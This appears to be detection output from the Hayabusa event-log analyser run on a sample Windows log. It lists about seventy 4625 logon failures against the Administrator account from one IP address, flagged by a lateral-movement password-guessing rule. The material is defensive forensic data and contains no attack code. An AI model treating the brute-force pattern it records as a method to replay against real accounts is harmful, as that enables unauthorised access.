| 1076 | 2016-09-20 01:50:24.886 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1077 | 2016-09-20 01:50:24.935 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1078 | 2016-09-20 01:50:24.990 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1079 | 2016-09-20 01:50:25.040 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1080 | 2016-09-20 01:50:25.153 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1081 | 2016-09-20 01:50:25.193 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1082 | 2016-09-20 01:50:25.232 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1083 | 2016-09-20 01:50:25.269 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1084 | 2016-09-20 01:50:25.308 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1085 | 2016-09-20 01:50:25.352 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1086 | 2016-09-20 01:50:25.407 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1087 | 2016-09-20 01:50:25.534 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1088 | 2016-09-20 01:50:25.593 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1089 | 2016-09-20 01:50:25.656 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1090 | 2016-09-20 01:50:25.700 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1091 | 2016-09-20 01:50:25.745 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1092 | 2016-09-20 01:50:25.774 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1093 | 2016-09-20 01:50:25.817 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1094 | 2016-09-20 01:50:25.859 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1095 | 2016-09-20 01:50:25.895 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1096 | 2016-09-20 01:50:25.929 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1097 | 2016-09-20 01:50:25.973 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1098 | 2016-09-20 01:50:26.088 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1099 | 2016-09-20 01:50:26.159 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1100 | 2016-09-20 01:50:26.307 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1101 | 2016-09-20 01:50:26.410 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1102 | 2016-09-20 01:50:26.453 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1103 | 2016-09-20 01:50:26.528 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1104 | 2016-09-20 01:50:26.619 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1105 | 2016-09-20 01:50:26.704 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1106 | 2016-09-20 01:50:26.793 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1107 | 2016-09-20 01:50:26.859 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1108 | 2016-09-20 01:50:27.024 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1109 | 2016-09-20 01:50:27.093 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1110 | 2016-09-20 01:50:27.170 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1111 | 2016-09-20 01:50:27.248 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1112 | 2016-09-20 01:50:27.290 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1113 | 2016-09-20 01:50:27.361 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1114 | 2016-09-20 01:50:27.424 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1115 | 2016-09-20 01:50:27.496 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1116 | 2016-09-20 01:50:27.537 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1117 | 2016-09-20 01:50:27.577 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1118 | 2016-09-20 01:50:27.624 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1119 | 2016-09-20 01:50:27.710 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1120 | 2016-09-20 01:50:27.772 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1121 | 2016-09-20 01:50:27.812 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1122 | 2016-09-20 01:50:27.848 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1123 | 2016-09-20 01:50:27.897 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1124 | 2016-09-20 01:50:27.939 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1125 | 2016-09-20 01:50:27.976 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1126 | 2016-09-20 01:50:28.013 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1127 | 2016-09-20 01:50:28.056 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1128 | 2016-09-20 01:50:28.096 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1129 | 2016-09-20 01:50:28.176 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1130 | 2016-09-20 01:50:28.204 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1131 | 2016-09-20 01:50:28.252 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1132 | 2016-09-20 01:50:28.309 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1133 | 2016-09-20 01:50:28.352 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1134 | 2016-09-20 01:50:28.395 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1135 | 2016-09-20 01:50:28.436 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1136 | 2016-09-20 01:50:28.476 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1137 | 2016-09-20 01:50:28.521 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1138 | 2016-09-20 01:50:28.556 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1139 | 2016-09-20 01:50:28.608 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1140 | 2016-09-20 01:50:28.645 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1141 | 2016-09-20 01:50:28.687 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1142 | 2016-09-20 01:50:28.728 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1143 | 2016-09-20 01:50:28.774 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1144 | 2016-09-20 01:50:28.814 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1145 | 2016-09-20 01:50:28.848 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
